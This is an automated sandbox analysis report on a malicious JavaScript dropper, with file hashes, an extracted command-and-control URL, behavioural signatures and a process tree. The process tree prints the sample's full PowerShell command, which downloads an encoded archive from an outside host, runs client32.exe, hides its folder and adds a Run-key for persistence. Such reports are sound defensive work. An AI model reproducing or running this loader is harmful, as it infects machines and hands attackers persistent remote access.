Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
06/07/2024, 03:06
Static task
static1
Behavioral task
behavioral1
Sample
348afd0b860223c0a3d36e3788c497c90285d21c426b25967a0f955e12874d06.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
348afd0b860223c0a3d36e3788c497c90285d21c426b25967a0f955e12874d06.js
Resource
win10v2004-20240704-en
General
-
Target
348afd0b860223c0a3d36e3788c497c90285d21c426b25967a0f955e12874d06.js
-
Size
7.3MB
-
MD5
8a6083929086197c95518b8ce0bcabac
-
SHA1
dbd7daf5830f884dfa4752b65b25bca2ceb5e8c2
-
SHA256
348afd0b860223c0a3d36e3788c497c90285d21c426b25967a0f955e12874d06
-
SHA512
667ed95353d152fe881c43c0f22e0826f8eb9b99572129a2d202526518bf0b0633ad58d56fc27badf794a66a3b4aaca16db576215b28f1fdfd4c014d45cb34e4
-
SSDEEP
49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQH:a
Malware Config
Extracted
http://helpcenter.cyou/help.php?9446
http://helpcenter.cyou/help.php?9446
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1300 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1300 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1300 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2564 wrote to memory of 1300 2564 wscript.exe 30 PID 2564 wrote to memory of 1300 2564 wscript.exe 30 PID 2564 wrote to memory of 1300 2564 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\348afd0b860223c0a3d36e3788c497c90285d21c426b25967a0f955e12874d06.js1⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $IIMPBVWCEM='http://helpcenter.cyou/help.php?9446';$JCGVORXL=(New-Object System.Net.WebClient).DownloadString($IIMPBVWCEM);$AFAIW=[System.Convert]::FromBase64String($JCGVORXL);$asd = Get-Random -Minimum -10 -Maximum 37; $AVER=[System.Environment]::GetFolderPath('ApplicationData')+'\VFQKHRIBA'+$asd;if (!(Test-Path $AVER -PathType Container)) { New-Item -Path $AVER -ItemType Directory };$p=Join-Path $AVER 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$AFAIW);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$AVER)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $AVER 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $AVER -Force; $fd.attributes='Hidden';$s=$AVER+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='LZTIEYORAZN';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-